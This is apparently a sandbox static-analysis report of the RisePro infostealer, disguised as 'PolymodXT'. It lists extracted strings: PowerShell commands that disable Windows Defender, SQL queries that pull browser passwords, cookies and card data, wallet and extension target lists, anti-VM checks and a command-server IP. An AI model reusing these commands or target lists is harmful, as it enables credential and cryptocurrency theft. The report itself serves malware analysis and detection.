Static | ZeroBOX

PE Compile Time

2075-09-14 16:22:39

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x0008a414    0x0008a600        5.87050710353
.rsrc   0x0008e000       0x000005e2    0x00000600        4.18423229049
.reloc  0x00090000       0x0000000c    0x00000200        0.101910425663

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x0008e0a0  0x00000358  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x0008e3f8  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<>9__33_0
<>9__27_0
Version11
8A09971C787BEEE474BD54896939731E2A3355B6E32B43DBAD8C01B16989FA81
Nullable`1
IComparable`1
IEnumerable`1
IOrderedEnumerable`1
Predicate`1
CallSite`1
Stack`1
Action`1
Comparison`1
IEqualityComparer`1
IEnumerator`1
ArraySegment`1
List`1
get_Item1
Microsoft.Win32
ReadUInt32
ToUInt32
ReadInt32
WriteInt32
ToInt32
GetInt32
SQLITE_CONFIG_GETPCACHE2
SQLITE_CONFIG_PCACHE2
Func`2
Tuple`2
KeyValuePair`2
ConcurrentDictionary`2
get_Item2
sqlite3_trace_v2
sqlite3_prepare_v2
sqlite3_close_v2
sqlite3_open_v2
Func`3
Tuple`3
sqlite3
get_Item3
ToUInt64
ReadInt64
ToInt64
GetInt64
sqlite3_bind_int64
sqlite3_column_int64
GetTickCount64
Func`4
Tuple`4
get_Item4
getMD5
get_Item5
ReadUInt16
ToUInt16
ReadInt16
ToInt16
GetInt16
12F3E0576D447EB37B36D82BA0C1C5481B8F0D12FDC70347CE4A076B229D4C86
459CB7F92764CF14CEDC73AC8441F9632C2F3C921D6548A7F0672D182B2F13F6
Tuple`6
get_Item6
pVaultItem7
9BF8B8F5278471CADD7855C9B61F9E373EE074000698135096C3092424366308
6DE05E636E501D77519EBF250AE7AB27AD93CB542C0B3E8CA130BC5765E4AC68
get_UTF8
pVaultItem8
<Module>
GetCurrentHwProfileA
CredEnumerateA
C133E473E5E653C5C4AEDB8BCC1C1A3A44D384FC0B6C0FCF04672B1B325EC01B
FCFE62B24FA31A5DF16A6355673DC67E3634638DF5134C2E8A9A4D498D54857B
CD2382355D9226A8C1CEEB9A9C63F823E230005D8BCBB8CC159DB065D7FD954C
CreateCompatibleDC
ReleaseDC
GENERIC
SQLITE_CONFIG_GETMALLOC
SQLITE_CONFIG_MALLOC
SQLITE_CONFIG_SINGLETHREAD
SQLITE_CONFIG_MULTITHREAD
USER_LOADED
CONNECTED
SQLITE_CONFIG_SERIALIZED
PlatformID
pClassID
GetClassID
get_FormatID
DOMAIN_VISIBLE_PASSWORD
DOMAIN_PASSWORD
SQLITE_CONFIG_LOOKASIDE
SQLITE_CONFIG_PAGECACHE
SQLITE_CONFIG_GETPCACHE
SQLITE_CONFIG_PCACHE
SQLITE_TRACE_PROFILE
FILETIME
SQLITE_CONFIG_NONE
SQLITE_TRACE_CLOSE
DOMAIN_CERTIFICATE
SQLITE_CONFIG_WIN32_HEAPSIZE
SQLITE_CONFIG_MMAP_SIZE
F287F1380EB445B32353E2806270F282A7CA37F5A2770C58F4A011F1328E334F
SQLITE_CONFIG_SQLLOG
SQLITE_CONFIG_LOG
SQLITE_CONFIG_SCRATCH
get_ASCII
SQLITE_CONFIG_URI
SQLITE_CONFIG_COVERING_INDEX_SCAN
System.IO
SQLITE_CONFIG_HEAP
ThrowExceptionForHR
CRED_ENUMERATE_VALID_FLAGS
CRED_ENUMERATE_ALL_CREDENTIALS
CRED_ENUMERATE_SESSION_CREDENTIALS
OpenVMS
SQLITE_CONFIG_MEMSTATUS
ALTMVS
NonPagedPoolCacheAlignedMustS
SQLITE_TRACE_STMT
PolymodXT
SQLITE_TRACE_ROW
SQLITE_CONFIG_GETMUTEX
SQLITE_CONFIG_MUTEX
value__
GetSchema
System.Data
pUserData
userData
CryptUnprotectData
NotADb
mscorlib
sqlite3_bind_blob
sqlite3_column_blob
System.Collections.Generic
HeapAlloc
get_Id
SchemaId
get_CanRead
ResumeThread
CreateThread
TerminateThread
get_CurrentThread
TryAdd
NonPagedPoolMustSucceed
get_IsAttached
Locked
Interlocked
NonPagedPoolCacheAligned
IsDefined
ElementType_Undefined
Stored
get_IsClosed
Unused
get_IsAllocated
get_RecordsAffected
get_Connected
SaveCompleted
ThrowIfCancellationRequested
get_IsCancellationRequested
dwReserved
System.Collections.Specialized
get_IsSynchronized
ElementType_Sid
ElementId_PackageSid
SafeHandleZeroOrMinusOneIsInvalid
ElementType_Guid
get_Guid
GetGuid
piShowCmd
GetShowCmd
SetShowCmd
ReadToEnd
ElementId_AppEnd
IDbCommand
CreateDbCommand
CreateCommand
PathAppend
post_send
get_Kind
DateTimeKind
RegistryValueKind
get_Second
NotFound
set_Method
method
Replace
IsNullOrWhiteSpace
IsWhiteSpace
get_StackTrace
Notice
GetService
CreateInstance
get_DataSource
get_UpdatedRowSource
set_UpdatedRowSource
UpdateRowSource
ElementId_Resource
LoadResource
FindResource
SizeofResource
LockResource
errorCode
get_StatusCode
HttpStatusCode
FileMode
CompressionMode
dwMode
base64Decode
get_Unicode
base64Encode
bytesToEncode
sqlite3_errcode
CredFree
HeapFree
get_Message
pMessage
AddRange
OnStateChange
CompareExchange
System.Net.Cache
SharedCache
EndInvoke
BeginInvoke
GetSchemaTable
DataTable
get_IsNullable
set_IsNullable
IEnumerable
IDisposable
get_DesignTimeVisible
set_DesignTimeVisible
ElementType_Double
ToDouble
GetDouble
sqlite3_bind_double
sqlite3_column_double
GCHandle
get_Handle
RuntimeFieldHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
GetTypeFromHandle
SetHandle
handle
ToSingle
DownloadFile
ReadIniFile
GetCurFile
pszFile
IsInRole
WindowsBuiltInRole
Console
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
sourceName
get_FileName
set_FileName
GetFileName
ppszFileName
get_MachineName
GetDataTypeName
get_EnglishName
get_FullName
destinationName
get_UserName
get_ParameterName
set_ParameterName
get_ProcessName
GetName
cchMaxName
subKeyName
GetDirectoryName
pszName
sqlite3_column_name
ToFileTime
GetDateTime
get_LastWriteTime
GetCreationTime
GetLastAccessTime
ReadLine
WriteLine
PathCombine
LocalMachine
get_None
get_DbType
set_DbType
ResetDbType
get_IsGenericType
get_FieldType
GetProviderSpecificFieldType
GetFieldType
get_CommandType
set_CommandType
ComInterfaceType
ChangeType
ValueType
GetUnderlyingType
SecurityProtocolType
ExpressionType
DontUseThisType
GetType
SocketType
GetElementType
set_ContentType
get_PropertyType
sqlite3_column_type
content_type
sqlite3_column_decltype
FileShare
Prepare
Compare
System.Core
PtrToStructure
get_CurrentUICulture
set_CurrentUICulture
get_InvariantCulture
Capture
get_OrdinalIgnoreCase
get_Database
ChangeDatabase
get_Response
HttpWebResponse
GetResponse
Dispose
TryParse
Misuse
X509Certificate
Truncate
Create
MulticastDelegate
get_State
ConnectionState
TcpState
Delete
CallSite
ReadWrite
ElementType_Attribute
DynamicAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GuidAttribute
UnverifiableCodeAttribute
NeutralResourcesLanguageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
InterfaceTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
GetCustomAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
RiseProAttribute
IgnoreDataMemberAttribute
DefaultMemberAttribute
UnmanagedFunctionPointerAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Minute
ReadByte
WriteByte
GetByte
get_Value
set_Value
GetProviderSpecificValue
get_HasValue
ContainsValue
TryGetValue
SetValue
RegistryHive
EndReceive
BeginReceive
get_IsAlive
PathIsRelative
get_IsPrimitive
Resolve
TryRemove
PolymodXT.exe
get_Size
set_Size
get_IsFixedSize
sqlite3_finalize
Resize
SizeOf
IndexOf
ElementId_Tag
HasFlag
TooBig
sqlite3_config
get_Png
System.Threading
GetEncoding
System.Drawing.Imaging
sqlite3_backup_remaining
System.Runtime.Versioning
Warning
get_SourceColumnNullMapping
set_SourceColumnNullMapping
FromBase64String
ToBase64String
ElementType_String
RtlUnicodeStringToAnsiString
GenerateRandomString
get_ConnectionString
set_ConnectionString
hexToString
BrandingFormatString
GetString
Substring
System.Drawing
msg_to_log
sqlite3_errmsg
BinarySearch
exCatch
IsMatch
Mismatch
ComputeHash
sqlite3_backup_finish
filePath
SetRelativePath
cchIconPath
pszIconPath
GetTempPath
SHGetKnownFolderPath
GetFolderPath
GetPath
SetPath
cchMaxPath
get_PrimaryScreenWidth
get_Length
set_Length
SetLength
set_ContentLength
length
EndsWith
StartsWith
get_Month
get_Depth
PtrToStringUni
PtrToStringAnsi
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
TimerCallback
callback
Rollback
RegistryKeyPermissionCheck
StoredBlock
PresentationFramework
NonExtendedMask
AllocHGlobal
FreeHGlobal
get_Local
ElementId_Illegal
Marshal
GetDecimal
Normal
GetOrdinal
ordinal
Internal
System.Security.Principal
WindowsPrincipal
SequenceEqual
pszPathRel
Cancel
System.ComponentModel
RequestCacheLevel
get_IsolationLevel
SetupDiGetDeviceInterfaceDetail
gdi32.dll
advapi32.dll
kernel32.dll
user32.dll
Crypt32.dll
winbrand.dll
setupapi.dll
psapi.dll
shlwapi.dll
ntdll.dll
IsDBNull
sqlite3_bind_null
set_SecurityProtocol
NonPagedPool
sqlite3_file_control
sqlite3_sql
FileStream
GetResponseStream
DeflateStream
get_EndOfStream
GetRequestStream
MemoryStream
get_Param
Tandem
get_Item
set_Item
get_Is64BitOperatingSystem
HashAlgorithm
Random
get_Platform
get_IsEnum
ElementType_Boolean
GetBoolean
TimeSpan
CancellationToken
CantOpen
X509Chain
AppDomain
get_CurrentDomain
SeekOrigin
get_SourceColumn
set_SourceColumn
piIcon
GetExtension
get_OSVersion
get_SourceVersion
set_SourceVersion
set_ProtocolVersion
HttpVersion
get_ServerVersion
RtlGetVersion
DataRowVersion
System.IO.Compression
GetIconLocation
SetIconLocation
ObjectBasicInformation
ObjectTypeInformation
System.Net.NetworkInformation
NtQuerySystemInformation
TcpConnectionInformation
destination
CopyPixelOperation
UnaryOperation
BinaryOperation
CancellationTokenRegistration
System.Globalization
System.Runtime.Serialization
op_Subtraction
set_Transaction
IDbTransaction
get_DbTransaction
set_DbTransaction
BeginDbTransaction
BeginTransaction
System.Reflection
ICollection
NameValueCollection
MatchCollection
WebHeaderCollection
get_DbParameterCollection
ManagementObjectCollection
get_Connection
IDbConnection
get_DbConnection
set_DbConnection
get_Direction
set_Direction
ParameterDirection
op_Addition
GetGenericTypeDefinition
get_Position
set_Position
CallingConvention
COMException
DbException
WebException
add_UnhandledException
ObjectDisposedException
NotImplementedException
NotSupportedException
ArgumentOutOfRangeException
IndexOutOfRangeException
ArgumentNullException
ApplicationException
InvalidOperationException
ArgumentException
InvalidCastException
GetDescription
SetDescription
System.Data.Common
StringComparison
SocketShutdown
Unknown
CompareTo
CopyTo
ImageCodecInfo
FieldInfo
FileInfo
TimeZoneInfo
GetCultureInfo
DriveInfo
FileSystemInfo
GetSystemInfo
SerializationInfo
MemberInfo
ConstructorInfo
DateTimeFormatInfo
get_InvariantInfo
CSharpArgumentInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
PropertyInfo
GetProcessHeap
CreateCompatibleBitmap
FromHbitmap
sqlite3_step
sqlite3_backup_step
ElementType_TimeStamp
Microsoft.CSharp
System.Linq
get_Year
GetChar
ExecuteScalar
InvokeMember
GetMember
fRemember
HttpRequestHeader
IDataReader
ExecuteDbDataReader
GetDbDataReader
ExecuteReader
StreamReader
TextReader
BinaryReader
IFormatProvider
DbConnectionStringBuilder
SpecialFolder
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
Encoder
GetBuffer
ServicePointManager
ElementType_Integer
ElementType_UnsignedInteger
Debugger
ManagementObjectSearcher
UnhandledExceptionEventHandler
sqlite3_progress_handler
ToUpper
StringComparer
set_Referer
referrer
CurrentUser
isWindows8OrGreater
CreateDbParameter
EncoderParameter
GetParameter
SetParameter
StreamWriter
TextWriter
BinaryWriter
GetDelegateForFunctionPointer
ToPointer
BitConverter
Register
ToLower
answer
sourceDir
destDir
pszDir
CommandBehavior
ElementId_Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
GetConstructor
Monitor
StructureToPtr
UIntPtr
ReadIntPtr
FromIntPtr
ToIntPtr
sqlite3_errstr
wcsstr
get_Hour
System.Diagnostics
GetFields
getCurrentTimeSeconds
get_TotalSeconds
get_TotalMilliseconds
FromMilliseconds
SetupDiEnumDeviceInterfaces
withSpaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
FormatterServices
System.Resources
DebuggingModes
DynamicTrees
StaticTrees
remainingPages
totalPages
sqlite3_total_changes
Matches
cookies
GetDirectories
GetFileSystemEntries
GetIPGlobalProperties
GetProperties
Microsoft.Win32.SafeHandles
GetFiles
DateTimeStyles
NumberStyles
GetValueNames
GetSubKeyNames
ReadLines
System.Runtime.InteropServices.ComTypes
GetProcesses
System.Security.Cryptography.X509Certificates
get_Attributes
FileAttributes
ReadBytes
decodedBytes
base64DecodeBytes
ReadAllBytes
GetBytes
sqlite3_column_bytes
GetProviderSpecificValues
GetValues
GetDrives
fFlags
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
SocketFlags
dwFlags
StateChangeEventArgs
UnhandledExceptionEventArgs
pszArgs
getCurrentTimeMillis
Equals
Contains
System.Linq.Expressions
System.Text.RegularExpressions
System.Collections
GetActiveTcpConnections
StringSplitOptions
get_Chars
GetChars
get_Headers
GetImageDecoders
RuntimeHelpers
SystemParameters
EncoderParameters
SslPolicyErrors
get_Hours
set_PriorityClass
ProcessPriorityClass
FileAccess
GetExitCodeProcess
OpenProcess
GetCurrentProcess
IPAddress
GetProcAddress
System.Net.Sockets
set_Arguments
GetGenericArguments
GetArguments
SetArguments
get_CanRaiseEvents
get_Exists
CheckRegistryKeyExists
SetupDiGetClassDevs
get_HasRows
System.Windows
get_Keys
RemoveAt
Concat
AppendFormat
ImageFormat
get_DriveFormat
GetFloat
ParseExact
GetUninitializedObject
WaitForSingleObject
ManagementBaseObject
NtDuplicateObject
DeleteObject
get_ExceptionObject
SelectObject
ManagementObject
NtQueryObject
object
Collect
Connect
System.Net
get_Target
Socket
sqlite3_reset
get_Offset
get_BaseUtcOffset
get_PrimaryScreenHeight
op_Explicit
IsDigit
Commit
sqlite3_backup_init
BitBlt
hVault
FirstOrDefault
IAsyncResult
NextResult
result
set_UserAgent
WebClient
System.Management
Environment
Component
hwndParent
get_Current
GetCurrent
System.Collections.Concurrent
IsProcessorFeaturePresent
CreateEvent
SetEvent
ResetEvent
sqlite3_bind_int
Constraint
IPEndPoint
get_RemoteEndPoint
get_LocalEndPoint
get_Count
get_FieldCount
get_VisibleFieldCount
GetByteCount
sqlite3_column_count
sqlite3_backup_pagecount
get_SyncRoot
set_Accept
accept
Interrupt
sqlite3_interrupt
Corrupt
ThreadStart
TrimStart
ElementId_AppStart
Insert
Convert
ElementType_Short
ElementType_UnsignedShort
ElementType_Last
HttpWebRequest
request
GetIDList
SetIDList
GetKeyboardLayoutList
Persist
get_CommandTimeout
set_CommandTimeout
set_ReceiveTimeout
get_ConnectionTimeout
sqlite3_busy_timeout
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
get_CommandText
set_CommandText
ReadAllText
WriteAllText
sqlite3_bind_text
sqlite3_column_text
GetThreadContext
StreamingContext
RegistryView
get_Now
get_UtcNow
GetConsoleWindow
set_CreateNoWindow
ShowWindow
GetModuleFileNameEx
GetIndex
sqlite3_bind_parameter_index
OrderBy
get_Day
get_Array
ElementType_ProtectedArray
ElementType_ByteArray
ToByteArray
InitializeArray
ToArray
get_IsArray
set_CachePolicy
RequestCachePolicy
get_IsReady
get_Key
CreateSubKey
OpenSubKey
OpenBaseKey
ContainsKey
RegistryKey
sqlite3_key
GetHotkey
SetHotkey
pwHotkey
System.Security.Cryptography
get_AddressFamily
get_IsReadOnly
sqlite3_db_readonly
IDictionary
LoadLibrary
FreeLibrary
ExecuteNonQuery
Memory
get_DbProviderFactory
CreateDirectory
GetWorkingDirectory
SetWorkingDirectory
set_CurrentDirectory
CopyDirectory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
ElementId_Identity
WindowsIdentity
IsNullOrEmpty
IsDirty
&Confuser.Core 1.7.0-alpha.4+657fb58dcf
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
PolymodXT v1.3
Get my money
Polymod Inc.
PolymodXT
Copyright
2021
$33648d89-b00c-47ef-9100-1c5557768c3a
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$00021401-0000-0000-C000-000000000046
$0000010c-0000-0000-C000-000000000046
$0000010b-0000-0000-C000-000000000046
$000214F9-0000-0000-C000-000000000046
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
ReadBytes routine is missing
WriteBytes routine is missing
RewindStream routine is missing
Adjust nodes failed
Inconsistent bl_counts!
catch CreateArchive
catch OpenArchive
catch Compress
catch SaveDirectoryPath
catch Delete
catch SaveArchive
Delete file: Read file header error
Delete file: Read first block error
Delete file: ZIP signature in error
Delete file: read file block error
Duplicate file name
No support for files over 4GB
Central directory is empty or in error
Central directory empty
No support for multi-disk ZIP file
Directory name must have a slash
File directory signature error
ZIP file is too short
Invalid ZIP file (No central directory)
Invalid file name
CommandType must be Text.
Connection must be Open; current state is {0}.
Connection property must be non-null.
CommandText must be specified
The transaction associated with this command is not the connection's active transaction.
isolationLevel
Specified IsolationLevel value is not supported.
BEGIN IMMEDIATE
Connection String Data Source must be set.
Cannot Open when State is {0}.
pragma journal_size_limit={0}
pragma temp_store={0}
JournalSizeLimit
pragma mmap_size={0}
pragma page_size={0}
Synchronous
_MmapSize
pragma synchronous={0}
pragma journal_mode={0}
PersistWal
pragma foreign_keys = on
pragma cache_size={0}
Source database is not open.
destination
destinationName
pages must not be 0.
sourceName
Destination database is not open.
Cache Size
Data Source
Default Timeout
Foreign Keys
FailIfMissing
Journal Mode
Page Size
Password
Read Only
_TempStore
Invalid value
Cannot convert {0} to bool.
ordinal
value must be between 0 and {0}.
Cannot convert {0} to byte.
bufferOffset + length cannot exceed buffer.Length
length
Cannot convert {0} to bytes.
Cannot convert {0} to short.
Cannot convert {0} to int.
Cannot convert {0} to long.
Cannot convert {0} to double.
Cannot convert {0} to single.
The column name '{0}' does not exist in the result set.
The data type name '{0}' is not supported.
There is no current result set.
Read must be called first.
yyyy-MM-dd HH:mm:ss.FFFFFFF
yyyy-MM-dd HH:mm:ss.FFFFFFFK
bigint
boolean
datetime
double
integer
single
string
varchar
longvarchar
THHmmssK
THHmmK
HH:mm:ss.FFFFFFFK
HH:mm:ssK
HH:mmK
yyyy-MM-dd HH:mm:ssK
yyyy-MM-dd HH:mmK
yyyy-MM-ddTHH:mm:ss.FFFFFFFK
yyyy-MM-ddTHH:mmK
yyyy-MM-ddTHH:mm:ssK
yyyyMMddHHmmssK
yyyyMMddHHmmK
yyyyMMddTHHmmssFFFFFFFK
THHmmss
HH:mm:ss.FFFFFFF
HH:mm:ss
yyyy-MM-dd HH:mm:ss
yyyy-MM-dd HH:mm
yyyy-MM-ddTHH:mm:ss.FFFFFFF
yyyy-MM-ddTHH:mm
yyyy-MM-ddTHH:mm:ss
yyyyMMddHHmmss
yyyyMMddHHmm
yyyyMMddTHHmmssFFFFFFF
yyyy-MM-dd
yyyyMMdd
yy-MM-dd
{0}: {1}
SqliteStatementList ref count decremented below zero.
There is no active transaction.
Already committed or rolled back.
This is not the active transaction.
COMMIT
ROLLBACK
Can't roll back nested transaction.
default
171.22.28.214
detect debugger
tempAVS
defender
check dirs
create dirs
sqlite3.dll
connect
tempCMS
detect vm
get sqlite
catch decrypt sqlite
decrypt sqlite
get settings
grab_screen
grab_tg
grab_ds
grab_wallets
grab_ihistory
started threads
vault init
Vault_IE
logins
WindowsCredentials
windows cred
vault passwords
vault fin
Outlook
outlook
catch windows cred
after windows cred
catch join browser threads
browsers
catch save info
save info
start saving
catch saving
saving
loader
sent archive
falied create folder Vars.pak_directory
after archive
failed create archive
created archive
screenshot.png
catch save screen
FileZilla
Plugins
IndexedDB
Wallets
catch save pluginscrypto
catch save tg
failed create history_dir
History
IsNullOrEmpty
ContainsKey
failed create cc_dir
ToString
expiration_month
expiration_year
exp_year
nickname
card_number
exp_month
last_four
name_on_card
billing_address_id
**** **** **** {0}
Name:
Nickname:
Month:
Year:
Card:
Address:
catch save historyCC
Autofill
failed create autofill_dir
Downloads
failed create downloads_dir
catch save autofill
Cookies
failed create cookies_dir
domain
httpOnly
secure
expirationDate
catch save cookies
passwords.txt
password
Storage:
Login:
Password:
profile
discord.txt
UserName:
E-MAIL:
Token:
foxmail.txt
catch save passwords
53F56307-B6BF-11D0-94F2-00A0C91EFB8B
information.txt
Version:
Date:
ddd MMM dd HH:mm:ss yyyy
Unknown
SOFTWARE\Microsoft\Cryptography
MachineGuid
MachineID:
GUID:
SELECT * FROM Win32_LogicalDisk WHERE DeviceID = '
VolumeSerialNumber
Work Dir:
Path:
%WINDOWS_LONG%
Location:
HWID:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
Windows:
Keyboard Languages:
Local Time:
d/M/yyyy H:mm:ss
TimeZone: UTC{0}
[Hardware]
Computer Name:
User Name:
Display Resolution: {0}x{1}
Display Language:
SELECT * FROM Win32_Processor
Processor:
CPU Count:
NumberOfLogicalProcessors
SELECT * FROM Win32_PhysicalMemory
Capacity
RAM: {0} MB
SELECT * FROM Win32_VideoController
VideoCard #{0}: {1}
[Processes]
{0} [{1}]
[Software]
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
DisplayName
DisplayVersion
Unhandled exception occurred
Telegram: https://t.me/RiseProSUPPORT
RisePro
Telegram: https://t.me/RiseProSUPPORT
SOFTWARE\Policies\Microsoft\Windows Defender
DisableRoutinelyTakingAction
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring
SOFTWARE\Microsoft\Windows Defender\Features
TamperProtection
DisableAntiSpyware
DisableOnAccessProtection
DisableScanOnRealtimeEnable
DisableRealtimeMonitoring
DisableIOAVProtection
DisableRawWriteNotification
powershell
Get-MpPreference -verbose
Set-MpPreference -DisableIntrusionPreventionSystem $true
DisableBlockAtFirstSeen
DisableIntrusionPreventionSystem
Set-MpPreference -DisableIOAVProtection $true
SevereThreatDefaultAction
HighThreatDefaultAction
Set-MpPreference -MAPSReporting 0
MAPSReporting
Set-MpPreference -SubmitSamplesConsent 2
Set-MpPreference -HighThreatDefaultAction 6 -Force
Set-MpPreference -DisableRealtimeMonitoring $true
DisableArchiveScanning
DisablePrivacyMode
Set-MpPreference -DisableScriptScanning $true
SignatureDisableUpdateOnStartupWithoutEngine
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
Set-MpPreference -ModerateThreatDefaultAction 6
LowThreatDefaultAction
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -SevereThreatDefaultAction 6
SubmitSamplesConsent
DisableScriptScanning
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisablePrivacyMode $true
Set-MpPreference -LowThreatDefaultAction 6
ModerateThreatDefaultAction
Set-MpPreference -DisableBlockAtFirstSeen $true
"\nrtbf/
u{0:X4}
"\nrtbf
GetObjectNameInThread
catch GetObjectNameInThread
failed get process
svchost
wallets
wallet.dat
Electrum\wallets
Anoncoin
ElectronCash\wallets
Ethereum\wallets
Dogecoin
Bither
ElectrumLTC
Megacoin
Mincoin
Namecoin
Bither\bither.db
Ledger Live
Primecoin
Terracoin
Electrum-LTC\wallets
Atomic
multidoge.wallet
Local Storage
bither.db
GoldCoin (GLD)
IOCoin
Infinitecoin
Wasabi
app-store.json
Session Storage
Guarda
Exodus
WalletWasabi\Client\Wallets
MultiDoge
Monero
Ethereum
Armory
Binance\app-store.json
Jaxx\Local Storage
Monero\wallets
BBQCoin
Bitcoin
Coinomi\Coinomi\wallets
Coinomi
DashCore
Florincoin
Franko
Freicoin
Ixcoin
com.liberty.jaxx
Litecoin
Reddcoin
Daedalus Mainnet
MultiDoge\multidoge.wallet
YACoin
Jaxx Liberty
Exodus\exodus.wallet
Electrum
devcoin
digitalcoin
Binance
ElectronCash
atomic\Local Storage
Authy Desktop
error utils.copyDirectory
catch closeSqlite
failed unlcok&copy
Data Source=
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
webException
catch request
https://api.myip.com/
application/x-www-form-urlencoded; charset=utf-8
application/json, text/plain, */*
get ip0_1
https://api64.ipify.org/?format=json
get ip0_2
https://ipinfo.io/widget/demo/
https://ipinfo.io/
country
get ip1
demoInfo
countryCode
https://db-ip.com/demo/home.php?s=
get ip2
https://maxmind.com/geoip/v2.1/city/me
https://www.maxmind.com/en/locate-my-ip-address
iso_code
get ip3
1.1.1.1
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
{0:X2}
kernel32.dll
SYSTEM\CurrentControlSet\Services\VBoxGuest
SYSTEM\CurrentControlSet\Services\vmhgfs
VMWARE
VBoxGuest
VBoxDrv
VBoxSF
JohnDoe
HAL9TH
ENC893*_
catch getFilesInDirectory
\Network
os_crypt
encrypted_key
base64DecodeBytes
SELECT action_url, origin_url, username_value, password_value FROM logins
SQL logic error:
catch passwords sql
file is not a database
autofill
SELECT name, value FROM autofill
catch autofills sql
download_history
SELECT tab_url, target_path FROM downloads
catch dwnlhistory sql
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, origin, billing_address_id, nickname FROM credit_cards
origin
SELECT name_on_card, exp_month, exp_year, last_four, nickname, bank_name, card_art_url, network FROM masked_credit_cards
bank_name
network
card_art_url
catch cc sql
cookies
Network\
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies
catch cookies sql
history
SELECT url, last_visit_time FROM(SELECT url, last_visit_time, id FROM urls ORDER BY id DESC LIMIT 2500) ORDER BY id ASC
catch history sql
Local Storage\leveldb
\Local Extension Settings\
\CURRENT
\IndexedDB\chrome-extension_
_0.indexeddb.leveldb\CURRENT
\Sync Extension Settings\
CURRENT
_0.indexeddb.leveldb
Login Data
Web Data
Login Data For Account
chromeDefault -
catch chromeDefault
bhghoamapcdpbohphigoooaddinpkbai
Authenticator
cgeeodpfagjceefieflmdfphplkenlfk
EVER Wallet
nlbmnnijcnlegkjjpcfjclmcfggfefdm
nkddgncdjgjfcddamfgcmfnlhccnimig
SaturnWallet
nanjmdknhkinifnkgdcggcfnhdaammmj
GuildWallet
bhhhlbepdkbapadjdnnojkbgioiodbic
Solflare
dkdedlpgdmmkkfjabffeganieamfklkm
CyanoWallet
cphhlgmgameodnhkjdmkpanlelnlohao
NeoLine
fnjhmkhhmkbjkkabndcnnogagogbneec
RoninWallet
fhmfendgdocmcbmfikdcogofphimnkno
Sollet
cnmamaachppnkjgnildpdmkaakejnhae
AuroWallet
fhilaheimglignddkjgofkcbgekhenbh
Oxygen
dmkamcknogkgcdfhhbddcghachkejeap
fihkakfobkmkjojpchpfgcmhfjnmnfpi
BitAppWallet
lpilbniiabackdjcionkobglmddfbcjo
WavesKeeper
ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLink
jojhfeoedkpkglbfimdfabpdfjaoolaf
PolymeshWallet
afbcbjpbpfadlkmhmclhkeeodmamcflc
MathWallet
bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom
cjmkndjhnagcfbpiemnkdpomccnjblmj
Finnie
jbdaocneiiinmjbjlgalhcelgbejmnid
NiftyWallet
ffnbelfdoeiohenkjibnmadjiehjhajb
fhbohimaelbohpjbbldcngcnapndodjp
BinanceChainWallet
acmacodkjbdgmoleebolmdjonilkdbch
odbfpeeihdkbihmopkbjmoonfanlbfcl
BraveWallet
epapihdplajcdnnkdeiahlgigofloibg
Sender Wallet
gjagmgiddbbciopjhllkdnddhcglnemk
Hashpack
aijcbedoijmgnlmjeegjaglmepbmpkpi
Leap Terra Wallet
egjidjbpglichdcondbcbdnbeeppgdph
Trust Wallet
nkbihfbeogaeaoehlefnkodbefgpgknn
MetaMask
cjelfplplebdjjenllpjcblmjkfcffne
Jaxx Liberty Extension
kncchdigobghenbbaddojjnnaogfppfj
iWallet
phkbamefinggmakgklpkljjmgibohnba
